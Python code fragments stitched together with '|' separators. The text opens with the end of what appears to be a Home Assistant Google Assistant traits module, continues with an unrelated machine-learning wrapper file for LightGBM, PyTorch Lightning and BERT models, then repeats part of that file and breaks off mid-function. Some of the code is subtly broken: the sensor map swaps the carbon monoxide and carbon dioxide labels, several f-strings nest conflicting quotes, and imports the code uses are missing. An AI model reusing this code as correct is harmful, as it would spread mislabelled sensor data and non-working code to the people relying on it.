domain == media_player.DOMAIN
and (features & media_player.SUPPORT_PLAY_MEDIA)
and device_class == media_player.DEVICE_CLASS_TV
):
return True
return False
def sync_attributes(self):
"""Return attributes for a sync request."""
return {"availableChannels": [], "commandOnlyChannels": True}
def query_attributes(self):
"""Return channel query attributes."""
return {}
async def execute(self, command, data, params, challenge):
"""Execute an setChannel command."""
if command == COMMAND_SELECT_CHANNEL:
channel_number = params.get("channelNumber")
else:
raise SmartHomeError(ERR_NOT_SUPPORTED, "Unsupported command")
if not channel_number:
raise SmartHomeError(
ERR_NO_AVAILABLE_CHANNEL,
"Channel is not available",
)
await self.hass.services.async_call(
media_player.DOMAIN,
media_player.SERVICE_PLAY_MEDIA,
{
ATTR_ENTITY_ID: self.state.entity_id,
media_player.ATTR_MEDIA_CONTENT_ID: channel_number,
media_player.ATTR_MEDIA_CONTENT_TYPE: MEDIA_TYPE_CHANNEL,
},
blocking=True,
context=data.context,
)
@register_trait
class SensorStateTrait(_Trait):
"""Trait to get sensor state.
https://developers.google.com/actions/smarthome/traits/sensorstate
"""
sensor_types = {
sensor.DEVICE_CLASS_AQI: ("AirQuality", "AQI"),
sensor.DEVICE_CLASS_CO: ("CarbonDioxideLevel", "PARTS_PER_MILLION"),
sensor.DEVICE_CLASS_CO2: ("CarbonMonoxideLevel", "PARTS_PER_MILLION"),
sensor.DEVICE_CLASS_PM25: ("PM2.5", "MICROGRAMS_PER_CUBIC_METER"),
sensor.DEVICE_CLASS_PM10: ("PM10", "MICROGRAMS_PER_CUBIC_METER"),
sensor.DEVICE_CLASS_VOLATILE_ORGANIC_COMPOUNDS: (
"VolatileOrganicCompounds",
"PARTS_PER_MILLION",
),
}
name = TRAIT_SENSOR_STATE
commands = []
@classmethod
def supported(cls, domain, features, device_class, _):
"""Test if state is supported."""
return domain == sensor.DOMAIN and device_class in cls.sensor_types
def sync_attributes(self):
"""Return attributes for a sync request."""
device_class = self.state.attributes.get(ATTR_DEVICE_CLASS)
if (data := self.sensor_types.get(device_class)) is not None:
return {
"sensorStatesSupported": {
"name": data[0],
"numericCapabilities": {"rawValueUnit": data[1]},
}
}
def query_attributes(self):
"""Return the attributes of this trait for this entity."""
device_class = self.state.attributes.get(ATTR_DEVICE_CLASS)
if (data := self.sensor_types.get(device_class)) is not None:
return {
"currentSensorStateData": [
{"name": data[0], "rawValue": self.state.state}
]
}
|
# coding:utf-8
import os
import pathlib
import numpy as np
import pandas as pd
import lightgbm as lgb
import pytorch_lightning as pl
from pytorch_lightning.callbacks import EarlyStopping, ModelCheckpoint
from pytorch_lightning.loggers import WandbLogger
from DNNmodel import *
from utils import *
def extractModelParameters(original_param, model):
model_params_keys = model.get_params().keys()
model_params = {}
for k, v in original_param.items():
if k in model_params_keys:
model_params[k] = v
print(model_params)
return model_params
def extractModelParametersWithStr(original_param, exclude_str="__"):
model_params = {}
for k, v in original_param.items():
if not exclude_str in k:
model_params[k] = v
print(model_params)
return model_params
class Averaging_Wrapper(object):
def __init__(self, df_train, df_test, target_col, path_to_meta_feature_dir, rate_list=None):
self.model = None
self.initial_params = {
"random_seed_name__":"random_state",
}
self.target_col = target_col
self.rate_list_ = rate_list
self.best_iteration_ = 1
self.df_meta_train, self.df_meta_test = self.setMetaFromFiles(path_to_meta_feature_dir)
idx1 = set(self.df_meta_train.index)
idx2 = set(df_train.index)
print(f"df_meta_train : {self.df_meta_train.shape}")
print(f"df_train : {df_train.shape}")
self.df_meta_train[target_col] = df_train.loc[self.df_meta_train.index, target_col]
def setMeta(self, df_train, df_test, target_col:str, y_pred_list:list, oof_list:list):
np_y_pred = np.concatenate(y_pred_list, 1)
np_oof = np.concatenate(oof_list, 1)
print(np_y_pred.shape)
print(np_oof.shape)
self.df_meta_test = pd.DataFrame(np_y_pred, index=df_test.index)
self.df_meta_train = pd.DataFrame(np_oof, index=df_train.index)
self.df_meta_train[target_col] = df_train[target_col]
def setMetaFromFiles(self, path_to_meta_feature_dir):
pp_dir = pathlib.Path(path_to_meta_feature_dir)
y_pred_list=[]
oof_list = []
name_list = []
for f in pp_dir.glob('*--_oof.csv'):
oof_f_name = f.name
name_list.append(oof_f_name)
print(oof_f_name)
df_oof = pd.read_csv(str(f.parent/oof_f_name), index_col=0)[self.target_col]
print(f"df_oof : {df_oof}")
oof_list.append(df_oof)
pred_f_name = oof_f_name.replace("oof", "submission")
print(pred_f_name)
df_pred = pd.read_csv(str(f.parent/pred_f_name), index_col=0)[self.target_col]
print(f"df_pred : {df_pred}")
y_pred_list.append(df_pred)
df_oof = pd.concat(oof_list, axis=1)
df_oof.columns = name_list
#df_oof.columns=[i for i in range(0, len(df_oof.columns))]
has_null_row_index = df_oof.loc[df_oof.isnull().any(axis=1)].index
df_oof = df_oof.loc[~df_oof.index.isin(has_null_row_index)]
df_pred = pd.concat(y_pred_list, axis=1)
df_pred.columns = name_list
#df_pred.columns=[i for i in range(0, len(df_pred.columns))]
self.name_list = name_list
#pdb.set_trace()
return df_oof, df_pred
def procModelSaving(self, model_dir_name, prefix, bs):
ppath_to_save_dir = PATH_TO_MODEL_DIR / model_dir_name
if not ppath_to_save_dir.exists():
ppath_to_save_dir.mkdir()
se_rate = pd.Series(self.rate_list_, index=self.name_list)
ppath_to_rate_file = ppath_to_save_dir / "rate.csv"
if ppath_to_rate_file.exists():
df_rate = pd.read_csv(ppath_to_rate_file, index_col=0)
se_rate.name = f"fold{df_rate.shape[1]}"
df_rate = pd.concat([df_rate, se_rate], axis=1)
else:
se_rate.name = "fold0"
df_rate = pd.DataFrame(se_rate)
df_rate.to_csv(ppath_to_rate_file)
print("######################")
print("### rate ###")
print(df_rate.mean(axis=1))
#pdb.set_trace()
def fit(self, X_train, y_train, X_valid=None, y_valid=None, X_holdout=None, y_holdout=None, params=None):
best_score_dict={}
eval_metric_func_dict = params["eval_metric_func_dict__"]
print(X_train)
if self.rate_list_ == None:
f = list(eval_metric_func_dict.values())[0]
def calc_loss_f(_rate_list, df_input_X, y_true):
this_pred = np.zeros(len(df_input_X))
for c, r in zip(df_input_X.columns, _rate_list):
this_pred += (df_input_X[c] * r).values
score = f(y_pred=this_pred, y_true=y_true)
return score
initial_rate_list = [0.5] * X_train.shape[1]
loss_partial = partial(calc_loss_f, df_input_X=X_train, y_true=y_train.values)
opt_result = sp.optimize.minimize(loss_partial, initial_rate_list, method='nelder-mead')
self.rate_list_ = opt_result["x"].tolist()
print(f"***** opt result : {self.rate_list_} *****")
print()
#pdb.set_trace()
y_train_pred = self.predict(X_train) #X_train.mean(axis=1).values
print(y_train_pred)
best_score_dict["train"]=calcEvalScoreDict(y_true=y_train.values, y_pred=y_train_pred, eval_metric_func_dict=eval_metric_func_dict)
if X_valid is not None:
#y_valid_pred = self.model.predict(X_valid)
y_valid_pred = self.predict(X_valid) #X_valid.mean(axis=1).values
best_score_dict["valid"] = calcEvalScoreDict(y_true=y_valid.values, y_pred=y_valid_pred, eval_metric_func_dict=eval_metric_func_dict)
if X_holdout is not None:
#y_holdout_pred = self.model.predict(X_holdout)
y_holdout_pred = self.predict(X_holdout)#X_holdout.mean(axis=1).values
best_score_dict["holdout"] = calcEvalScoreDict(y_true=y_holdout.values, y_pred=y_holdout_pred, eval_metric_func_dict=eval_metric_func_dict)
self.best_score_ = best_score_dict
print(self.best_score_)
self.setFeatureImportance(X_train.columns)
def predict(self, X_test, oof_flag=True):
if self.rate_list_ == None:
print(f"X_test : {X_test}")
print(f"X_test.mean(axis=1) : {X_test.mean(axis=1)}")
return X_test.mean(axis=1).values
else:
pred = np.zeros(len(X_test))
for c, r in zip(X_test.columns, self.rate_list_):
pred += (X_test[c] * r).values
return pred.reshape(-1, 1)
def setFeatureImportance(self, columns_list):
self.feature_importances_ = np.zeros(len(columns_list))
class PytrochLightningBase():
def __init__(self):
super().__init__()
self.initial_params = {
"eval_max_or_min": "min",
"val_every":1,
"dataset_params":{},
"random_seed_name__":"random_state",
'num_class':1, #binary classification as regression with value between 0 and 1
"use_gpu":1,
'multi_gpu':False,
}
self.edit_params = {}
self.best_iteration_ = 1
self.reload_flag = False
self.model = None
def fit(self, X_train, y_train, X_valid=None, y_valid=None, X_holdout=None, y_holdout=None, params=None):
params = prepareModelDir(params, self.__class__.__name__)
self.edit_params = params
pl.seed_everything(params[params["random_seed_name__"]])
torch.backends.cudnn.enabled = True
self.model.setParams(params)
batch_size = params["batch_size"]
if batch_size < 0:
batch_size = X_train.shape[0]
data_set_train = params["dataset_class"](X_train, y_train, params["dataset_params"], train_flag=True)
dataloader_train = torch.utils.data.DataLoader(data_set_train, batch_size=batch_size, shuffle=True, collate_fn=params["collate_fn"],num_workers=params["num_workers"]) #, sampler=ImbalancedDatasetSampler(data_set_train))
dataloader_val = None
if X_valid is not None:
data_set_val = params["dataset_class"](X_valid, y_valid, params["dataset_params"], train_flag=True)
dataloader_val = torch.utils.data.DataLoader(data_set_val, batch_size=batch_size, shuffle=False, collate_fn=params["collate_fn"],num_workers=params["num_workers"])
wandb_logger=None
if (not ON_KAGGLE) and (params["no_wandb"]==False):
wandb_run = wandb.init(project=PROJECT_NAME, group=params["wb_group_name"], reinit=True, name=params["wb_run_name"] )
wandb_logger = WandbLogger(experment=wandb_run)
wandb_logger.log_hyperparams(params)
early_stop_callback = EarlyStopping(
monitor=f'val_{params['eval_metric']}',
min_delta=0.00,
patience=params['early_stopping_rounds'],
verbose=True,
mode=params['eval_max_or_min']
)
checkpoint_callback = ModelCheckpoint(
dirpath=PATH_TO_MODEL_DIR / params["model_dir_name"],
filename=params["path_to_model"].stem,
verbose=True,
monitor=f'val_{params['eval_metric']}',
mode=params['eval_max_or_min'],
save_weights_only=True,
)
callbacks_list = []
if params['early_stopping_rounds'] <= self.initial_params["epochs"]:
callbacks_list = [early_stop_callback, checkpoint_callback]
metrics_callback = MetricsCallback(monitor_metric=f'val_{params['eval_metric']}',min_max_flag=params['eval_max_or_min'])
callbacks_list.append(metrics_callback)
self.trainer = pl.Trainer(
num_sanity_val_steps=0,
gpus=self.initial_params["use_gpu"],
check_val_every_n_epoch=self.initial_params["val_every"],
max_epochs=self.initial_params["epochs"],
accumulate_grad_batches=self.initial_params["accumulate_grad_batches"],
callbacks=callbacks_list,#early_stop_callback, checkpoint_callback],
logger=wandb_logger,
)
self.trainer.fit(self.model, dataloader_train, dataloader_val)
if X_valid is None:
new_path = checkExistsAndAddVnum(params["path_to_model"])
self.trainer.save_checkpoint(str(new_path))
self.best_score_, self.best_iteration_ = metrics_callback.getScoreInfo()
print(self.best_score_)
self.feature_importances_ = np.zeros(len(X_train.columns))
def predict(self, X_test, oof_flag=False):
num_tta = self.edit_params["num_tta"]
batch_size=self.edit_params["batch_size"]
dummy_y = pd.DataFrame(np.zeros((X_test.shape[0], 1)), index=X_test.index)
data_set_test = self.edit_params["dataset_class"](X_test, dummy_y, self.edit_params["dataset_params"], train_flag=(num_tta>1))
dataloader_test = torch.utils.data.DataLoader(data_set_test, batch_size=batch_size, shuffle=False, collate_fn=self.edit_params["collate_fn"],num_workers=self.edit_params["num_workers"])
self.model.oof_prediction = oof_flag
if self.model.oof_prediction==False:
self.trainer.logger = None
tta_list = []
for tta_i in range(num_tta):
print(f"tta : {tta_i+1}th")
if self.reload_flag:
self.trainer.test(test_dataloaders=dataloader_test, model=self.model)
else:
self.trainer.test(test_dataloaders=dataloader_test, ckpt_path='best')
final_preds = self.model.final_preds
tta_list.append(final_preds)
#pdb.set_trace()
return np.array(tta_list).mean(axis=0)
def procModelSaving(self, model_dir_name, prefix, bs):
ppath_to_save_dir = PATH_TO_MODEL_DIR / model_dir_name
if not ppath_to_save_dir.exists():
ppath_to_save_dir.mkdir()
ppath_to_model = ppath_to_save_dir / f"model__{prefix}__{model_dir_name}__{self.__class__.__name__}.pkl"
torch.save(self.model.state_dict(), str(ppath_to_model))
print(f'Trained nn model was saved! : {ppath_to_model}')
with open(str(ppath_to_model).replace("model__", "bs__").replace("pkl", "json"), 'w') as fp:
json.dump(bs, fp)
def procLoadModel(self, model_dir_name, prefix, params):
self.edit_params = params
self.model.cuda()
if params["multi_gpu"]:
self.model = nn.DataParallel(self.model)
ppath_to_save_dir = PATH_TO_UPLOAD_MODEL_PARENT_DIR / model_dir_name
print(f"ppath_to_save_dir : {ppath_to_save_dir}")
print(list(ppath_to_save_dir.glob(f'model__{prefix}*')))
#print(list(ppath_to_save_dir.iterdir()))
name_list = list(ppath_to_save_dir.glob(f'model__{prefix}*'))
if len(name_list)==0:
print(f'[ERROR] Trained nn model was NOT EXITS! : {prefix}')
return -1
ppath_to_model = name_list[0]
ppath_to_ckpt_model = searchCheckptFile(ppath_to_save_dir, ppath_to_model, prefix)
#pdb.set_trace()
self.model.load_state_dict(torch.load(str(ppath_to_ckpt_model))["state_dict"])
#self.model.load_state_dict(torch.load(str(ppath_to_model)))
print(f'Trained nn model was loaded! : {ppath_to_ckpt_model}')
a = int(re.findall('iter_(\d+)__', str(ppath_to_model))[0])
#print(self.model.best_iteration_ )
#self.model.best_iteration_
self.best_iteration_ = a
path_to_json = str(ppath_to_model).replace("model__", "bs__").replace("pkl", "json")
if not os.path.exists(path_to_json):
print(f'[ERROR] Trained nn json was NOT EXITS! : {path_to_json}')
return -1
with open(path_to_json) as fp:
self.best_score_ = json.load(fp)
#self.model._best_score = json.load(fp)
self.trainer = pl.Trainer(
num_sanity_val_steps=0,
gpus=self.edit_params["use_gpu"],
check_val_every_n_epoch=self.edit_params["val_every"],
max_epochs=self.edit_params["epochs"],
)
self.reload_flag = True
return 0
class BERT_Wrapper(PytrochLightningBase):
def __init__(self,
model_name,
auxiliary_loss_flag,
text_features_list,
embedding_category_features_list,
continuous_features_list,
label_list,
weight_list=None,
max_token_len=200, #128,#162,#200,#256, #,
_type="regression",
exp="None",
):
super().__init__()
if model_name == "bert":
path_of_pretrained_model = 'bert-base-cased'
elif model_name == "bert-tiny":
path_of_pretrained_model = "prajjwal1/bert-tiny"
elif model_name == "finbert":
path_of_pretrained_model = "ipuneetrathore/bert-base-cased-finetuned-finBERT"
elif model_name == "funnel":
path_of_pretrained_model = "funnel-transformer/small"
elif model_name == "bart":
path_of_pretrained_model = 'facebook/bart-base'
elif model_name == "distilbert":
path_of_pretrained_model = 'distilbert-base-cased'
elif model_name == "multilingual":
path_of_pretrained_model = "bert-base-multilingual-cased"
elif model_name == "roberta-base":
path_of_pretrained_model = "roberta-base"
elif model_name == "bert-large":
path_of_pretrained_model = "bert-large-cased"
elif model_name == "gpt2":
path_of_pretrained_model = "gpt2"
self.initial_params["dataset_class"] = BertDataSet
self.initial_params["collate_fn"] = None#collate_fn_LSTM
n_classes = len(label_list) #if _type=="regression" else 400
if auxiliary_loss_flag:
aux_loss_list = ["loan_in_currency2"]
continuous_features_list = [c for c in continuous_features_list if c not in aux_loss_list ]
else:
aux_loss_list=[]
self.initial_params["dataset_params"] = {
"embedding_category_features_list":embedding_category_features_list,
"continuous_features_list":continuous_features_list,
"text_feature":text_features_list[0],
"weight_list":weight_list,
#"use_feature_cols":use_feature_cols,
#"last_query_flag":last_query_flag,
"max_token_len":max_token_len,
"label_col":label_list + aux_loss_list, #["LOAN_AMOUNT"] + aux_loss_list,
"path_of_pretrained_model":path_of_pretrained_model,
}
ppath_to_decode_dict = PROC_DIR / 'decode_dict.pkl'
if ppath_to_decode_dict.exists():
dec_dict = pickle_load(ppath_to_decode_dict)
else:
dec_dict=None
emb_dim_pairs_list = []
print("embedding_category_features_list")
for col in embedding_category_features_list:
if col == "ORIGINAL_LANGUAGE":
dim = 5
emb_dim = 3
elif col == "ACTIVITY_NAME":
dim = 161
emb_dim = 50
elif col == "SECTOR_NAME":
dim = 15
emb_dim = 8
elif col == "COUNTRY_NAME":
dim = 61
emb_dim = 30
elif col == "CURRENCY":
dim = 51
emb_dim = 25
elif col == "REPAYMENT_INTERVAL":
dim = 3
emb_dim = 2
# elif col == "DISTRIBUTION_MODEL":
# dim = 2
# emb_dim = 2
elif col == "COUNTRY_CURRENCY":
dim = 75
emb_dim = 38
elif col == "TOWN_NAME_COUNTRY_NAME":
dim = 2822
emb_dim = 50
else:
if (dec_dict is not None) & (col in dec_dict.keys()):
dim = len(dec_dict[col].keys())
emb_dim = min(dim//2, 50)
else:
continue
#dim = int(df_all[col].nunique())
pair = (dim, emb_dim)
emb_dim_pairs_list.append(pair)
print("{} : {}".format(col, pair))
self.model = myBert(
model_name=model_name,
path_of_pretrained_model=path_of_pretrained_model,
n_numerical_features=len(continuous_features_list),
n_emb_features = len(embedding_category_features_list),
emb_dim_pairs_list=emb_dim_pairs_list,
n_classes=n_classes,
n_classes_aux=len(aux_loss_list),
_type = _type,
exp=exp,
)
print(self.model)
def predict(self, X_test, oof_flag=False):
num_tta = self.edit_params["num_tta"]
assert num_tta==1
if num_tta == 1:
np_pred = super().predict(X_test, oof_flag)
#TODO: get final attention
return np_pred
def prepareModelDir(params, prefix):
ppath_to_save_dir = PATH_TO_MODEL_DIR / params["model_dir_name"]
if not ppath_to_save_dir.exists():
ppath_to_save_dir.mkdir()
params["path_to_model"] = ppath_to_save_dir / f"{prefix}_train_model.ckpt"
return params
def checkExistsAndAddVnum(ppath_to_model):
v_num = 0
cur_path = ppath_to_model
stem = cur_path.stem
while cur_path.exists():
v_num+=1
cur_path = cur_path.parent/f"{stem}-v{v_num}.ckpt"
return cur_path
class LGBWrapper_Base(object):
"""
A wrapper for lightgbm model so that we will have a single api for various models.
"""
def __init__(self):
self.model = None
self.initial_params = {
'n_jobs': -1,
#"device":"gpu",
'boosting_type': 'gbdt',
"random_seed_name__":"random_state",
"deal_numpy":False,
"first_metric_only": True,
'max_depth': 6,
#'max_bin': 300,
#'bagging_fraction': 0.9,
#'bagging_freq': 1,
'colsample_bytree': 0.9,
#'colsample_bylevel': 0.3,
#'min_data_per_leaf': 2,
"min_child_samples":12, #8,
'num_leaves': 120,#240,#2048,#1024,#31,#240,#120,#32, #3000, #700, #500, #400, #300, #120, #80,#300,
'lambda_l1': 0.9,#0.5,
'lambda_l2': 0.9,#0.5,
}
def getWeight(self, X_train, params):
if isinstance(X_train, pd.DataFrame):
weight_list = params["weight_list"]
if len(weight_list) == 0:
np_weight=None
elif len(weight_list)==1:
np_weight = X_train[weight_list[0]].values
X_train = X_train.drop(columns=weight_list)
else:
raise Exception("set only one weight col to weight_list")
else:
raise Exception("not implemented error : weight col for numpy X_train")
return X_train, np_weight
def fit(self, X_train, y_train, X_valid=None, y_valid=None, X_holdout=None, y_holdout=None, params=None):
self.edit_params=params
metric_name = list(params["eval_metric_func_dict__"].keys())[0]
print(f"metric_name : {metric_name}")
eval_metric = params["eval_metric_func_dict__"][metric_name]
params["metric"] = "None"
print(f"----------eval_metric:{callable(eval_metric)}")
X_train, np_weight = self.getWeight(X_train, params)
eval_set = [(X_train.values, y_train.values)] if isinstance(X_train, pd.DataFrame) else [(X_train, y_train)]
eval_names = ['train']
self.model = self.model.set_params(**extractModelParametersWithStr(params, exclude_str="__"))
if X_valid is not None:
if isinstance(X_valid, pd.DataFrame):
eval_set.append((X_valid.values, y_valid.values))
else:
eval_set.append((X_valid, y_valid))
eval_names.append('valid')
if X_holdout is not None:
if isinstance(X_holdout, pd.DataFrame):
eval_set.append((X_holdout.values, y_holdout.values))
else:
eval_set.append((X_holdout, y_holdout))
eval_names.append('holdout')
categorical_columns = 'auto'
call_back_list = []
if (not ON_KAGGLE) and (params["no_wandb"]==False):
wandb.init(project=PROJECT_NAME, group=params["wb_group_name"], reinit=True, name=params["wb_run_name"] )
wandb.config.update(params, allow_val_change=True)
call_back_list.append(wandb_callback())
self.model.fit(X=X_train, y=y_train, sample_weight=np_weight,
eval_set=eval_set, eval_names=eval_names, eval_metric=eval_metric,
verbose=params['verbose'], early_stopping_rounds=params['early_stopping_rounds'],
categorical_feature=categorical_columns,
callbacks=call_back_list,
)
print(self.model)
self.best_score_ = self.model.best_score_
print(self.best_score_)
self.feature_importances_ = self.model.feature_importances_
self.best_iteration_ = self.model.best_iteration_
def predict(self, X_test, oof_flag=True):
X_test, np_weight = self.getWeight(X_test, self.edit_params)
return self.model.predict(X_test, num_iteration=self.model.best_iteration_).reshape(-1, 1)
def procModelSaving(self, model_dir_name, prefix, bs):
ppath_to_save_dir = PATH_TO_MODEL_DIR / model_dir_name
if not ppath_to_save_dir.exists():
ppath_to_save_dir.mkdir()
ppath_to_model = ppath_to_save_dir / f"model__{prefix}__{model_dir_name}__{self.__class__.__name__}.pkl"
pickle.dump(self.model, open(ppath_to_model, 'wb'))
print(f'Trained LGB model was saved! : {ppath_to_model}')
with open(str(ppath_to_model).replace("model__", "bs__").replace("pkl", "json"), 'w') as fp:
json.dump(bs, fp)
def procLoadModel(self, model_dir_name, prefix, params):
ppath_to_save_dir = PATH_TO_UPLOAD_MODEL_PARENT_DIR / model_dir_name
print(f"ppath_to_save_dir : {ppath_to_save_dir}")
print(list(ppath_to_save_dir.glob(f'model__{prefix}*')))
#print(list(ppath_to_save_dir.iterdir()))
name_list = list(ppath_to_save_dir.glob(f'model__{prefix}*'))
if len(name_list)==0:
print(f'[ERROR] Trained LGB model was NOT EXITS! : {prefix}')
return -1
ppath_to_model = name_list[0]
# if not os.path.exists(ppath_to_model):
# print(f'[ERROR] Trained LGB model was NOT EXITS! : {ppath_to_model}')
# return -1
self.model = pickle.load(open(ppath_to_model, 'rb'))
print(f'Trained LGB model was loaded! : {ppath_to_model}')
a = int(re.findall('iter_(\d+)__', str(ppath_to_model))[0])
self.model._best_iteration= a
#print(self.model.best_iteration_ )
#self.model.best_iteration_
self.best_iteration_ = self.model.best_iteration_
path_to_json = str(ppath_to_model).replace("model__", "bs__").replace("pkl", "json")
if not os.path.exists(path_to_json):
print(f'[ERROR] Trained LGB json was NOT EXITS! : {path_to_json}')
return -1
with open(path_to_json) as fp:
self.best_score_ = json.load(fp)
#self.model._best_score = json.load(fp)
return 0
class LGBWrapper_regr(LGBWrapper_Base):
"""
A wrapper for lightgbm model so that we will have a single api for various models.
"""
def __init__(self):
super().__init__()
self.model = lgb.LGBMRegressor()
print(f"lgb version : {lgb.__version__}")
self.initial_params['objective'] = 'regression' #torch_rmse #'regression'
self.initial_params['metric'] = 'mae'
def fit(self, X_train, y_train, X_valid=None, y_valid=None, X_holdout=None, y_holdout=None, params=None):
if isinstance(y_train, pd.DataFrame):
assert y_train.shape[1] == 1
y_train = y_train.iloc[:,0]
if y_valid is not None:
if isinstance(y_valid, pd.DataFrame):
assert y_valid.shape[1] == 1
y_valid = y_valid.iloc[:,0]
if y_holdout is not None:
if isinstance(y_holdout, pd.DataFrame):
assert y_holdout.shape[1] == 1
y_holdout = y_holdout.iloc[:,0]
#pdb.set_trace()
super().fit(X_train=X_train, y_train=y_train, X_valid=X_valid, y_valid=y_valid, X_holdout=X_holdout, y_holdout=y_holdout, params=params)
class LGBWrapper_cls(LGBWrapper_Base):
"""
A wrapper for lightgbm model so that we will have a single api for various models.
"""
def __init__(self):
super().__init__()
self.model = lgb.LGBMClassifier()
self.initial_params['num_leaves'] = 3
self.initial_params['max_depth'] = 8
self.initial_params['min_data_in_leaf'] = 3
def proc_predict(self, X_test, oof_flag=False):
if oof_flag:
pred = self.model.predict(X_test, num_iteration=self.model.best_iteration_)
else:
pred = self.model.predict_proba(X_test, num_iteration=self.model.best_iteration_)
return pred
#def predict_proba(self, X_test):
def predict(self, X_test, oof_flag=False):
if (self.model.objective == 'binary') :
#print("X_test b:", X_test)
#print("X_test:shape b", X_test.shape)
return self.model.predict_proba(X_test, num_iteration=self.model.best_iteration_)[:, 1]
else:
return self.model.predict_proba(X_test, num_iteration=self.model.best_iteration_)
#pred = self.proc_predict(X_test, oof_flag)
#return self.model.predict(X_test, num_iteration=self.model.best_iteration_)
def predict_proba(self, X_test):
#print("X_test:", X_test)
#print("X_test:shape", X_test.shape)
return self.model.predict_proba(X_test, num_iteration=self.model.best_iteration_)
| # coding:utf-8
import os
import pathlib
import numpy as np
import pandas as pd
import lightgbm as lgb
import pytorch_lightning as pl
from pytorch_lightning.callbacks import EarlyStopping, ModelCheckpoint
from pytorch_lightning.loggers import WandbLogger
from DNNmodel import *
from utils import *
def extractModelParameters(original_param, model):
model_params_keys = model.get_params().keys()
model_params = {}
for k, v in original_param.items():
if k in model_params_keys:
model_params[k] = v
print(model_params)
return model_params
def extractModelParametersWithStr(original_param, exclude_str="__"):
model_params = {}
for k, v in original_param.items():
if not exclude_str in k:
model_params[k] = v
print(model_params)
return model_params
class Averaging_Wrapper(object):
def __init__(self, df_train, df_test, target_col, path_to_meta_feature_dir, rate_list=None):
self.model = None
self.initial_params = {
"random_seed_name__":"random_state",
}
self.target_col = target_col
self.rate_list_ = rate_list
self.best_iteration_ = 1
self.df_meta_train, self.df_meta_test = self.setMetaFromFiles(path_to_meta_feature_dir)
idx1 = set(self.df_meta_train.index)
idx2 = set(df_train.index)
print(f"df_meta_train : {self.df_meta_train.shape}")
print(f"df_train : {df_train.shape}")
self.df_meta_train[target_col] = df_train.loc[self.df_meta_train.index, target_col]
def setMeta(self, df_train, df_test, target_col:str, y_pred_list:list, oof_list:list):
np_y_pred = np.concatenate(y_pred_list, 1)
np_oof = np.concatenate(oof_list, 1)
print(np_y_pred.shape)
print(np_oof.shape)
self.df_meta_test = pd.DataFrame(np_y_pred, index=df_test.index)
self.df_meta_train = pd.DataFrame(np_oof, index=df_train.index)
self.df_meta_train[target_col] = df_train[target_col]
def setMetaFromFiles(self, path_to_meta_feature_dir):
pp_dir = pathlib.Path(path_to_meta_feature_dir)
y_pred_list=[]
oof_list = []
name_list = []
for f in pp_dir.glob('*--_oof.csv'):
oof_f_name = f.name
name_list.append(oof_f_name)
print(oof_f_name)
df_oof = pd.read_csv(str(f.parent/oof_f_name), index_col=0)[self.target_col]
print(f"df_oof : {df_oof}")
oof_list.append(df_oof)
pred_f_name = oof_f_name.replace("oof", "submission")
print(pred_f_name)
df_pred = pd.read_csv(str(f.parent/pred_f_name), index_col=0)[self.target_col]
print(f"df_pred : {df_pred}")
y_pred_list.append(df_pred)
df_oof = pd.concat(oof_list, axis=1)
df_oof.columns = name_list
#df_oof.columns=[i for i in range(0, len(df_oof.columns))]
has_null_row_index = df_oof.loc[df_oof.isnull().any(axis=1)].index
df_oof = df_oof.loc[~df_oof.index.isin(has_null_row_index)]
df_pred = pd.concat(y_pred_list, axis=1)
df_pred.columns = name_list
#df_pred.columns=[i for i in range(0, len(df_pred.columns))]
self.name_list = name_list
#pdb.set_trace()
return df_oof, df_pred
def procModelSaving(self, model_dir_name, prefix, bs):
ppath_to_save_dir = PATH_TO_MODEL_DIR / model_dir_name
if not ppath_to_save_dir.exists():
ppath_to_save_dir.mkdir()
se_rate = pd.Series(self.rate_list_, index=self.name_list)
ppath_to_rate_file = ppath_to_save_dir / "rate.csv"
if ppath_to_rate_file.exists():
df_rate = pd.read_csv(ppath_to_rate_file, index_col=0)
se_rate.name = f"fold{df_rate.shape[1]}"
df_rate = pd.concat([df_rate, se_rate], axis=1)
else:
se_rate.name = "fold0"
df_rate = pd.DataFrame(se_rate)
df_rate.to_csv(ppath_to_rate_file)
print("######################")
print("### rate ###")
print(df_rate.mean(axis=1))
#pdb.set_trace()
def fit(self, X_train, y_train, X_valid=None, y_valid=None, X_holdout=None, y_holdout=None, params=None):
best_score_dict={}
eval_metric_func_dict = params["eval_metric_func_dict__"]
print(X_train)
if self.rate_list_ == None:
f = list(eval_metric_func_dict.values())[0]
def calc_loss_f(_rate_list, df_input_X, y_true):
this_pred = np.zeros(len(df_input_X))
for c, r in zip(df_input_X.columns, _rate_list):
this_pred += (df_input_X[c] * r).values
score = f(y_pred=this_pred, y_true=y_true)
return score
initial_rate_list = [0.5] * X_train.shape[1]
loss_partial = partial(calc_loss_f, df_input_X=X_train, y_true=y_train.values)
opt_result = sp.optimize.minimize(loss_partial, initial_rate_list, method='nelder-mead')
self.rate_list_ = opt_result["x"].tolist()
print(f"***** opt result : {self.rate_list_} *****")
print()
#pdb.set_trace()
y_train_pred = self.predict(X_train) #X_train.mean(axis=1).values
print(y_train_pred)
best_score_dict["train"]=calcEvalScoreDict(y_true=y_train.values, y_pred=y_train_pred, eval_metric_func_dict=eval_metric_func_dict)
if X_valid is not None:
#y_valid_pred = self.model.predict(X_valid)
y_valid_pred = self.predict(X_valid) #X_valid.mean(axis=1).values
best_score_dict["valid"] = calcEvalScoreDict(y_true=y_valid.values, y_pred=y_valid_pred, eval_metric_func_dict=eval_metric_func_dict)
if X_holdout is not None:
#y_holdout_pred = self.model.predict(X_holdout)
y_holdout_pred = self.predict(X_holdout)#X_holdout.mean(axis=1).values
best_score_dict["holdout"] = calcEvalScoreDict(y_true=y_holdout.values, y_pred=y_holdout_pred, eval_metric_func_dict=eval_metric_func_dict)
self.best_score_ = best_score_dict
print(self.best_score_)
self.setFeatureImportance(X_train.columns)
def predict(self, X_test, oof_flag=True):
if self.rate_list_ == None:
print(f"X_test : {X_test}")
print(f"X_test.mean(axis=1) : {X_test.mean(axis=1)}")
return X_test.mean(axis=1).values
else:
pred = np.zeros(len(X_test))
for c, r in zip(X_test.columns, self.rate_list_):
pred += (X_test[c] * r).values
return pred.reshape(-1, 1)
def setFeatureImportance(self, columns_list):
self.feature_importances_ = np.zeros(len(columns_list))
class PytrochLightningBase():
def __init__(self):
super().__init__()
self.initial_params = {
"eval_max_or_min": "min",
"val_every":1,
"dataset_params":{},
"random_seed_name__":"random_state",
'num_class':1, #binary classification as regression with value between 0 and 1
"use_gpu":1,
'multi_gpu':False,
}
self.edit_params = {}
self.best_iteration_ = 1
self.reload_flag = False
self.model = None
def fit(self, X_train, y_train, X_valid=None, y_valid=None, X_holdout=None, y_holdout=None, params=None):
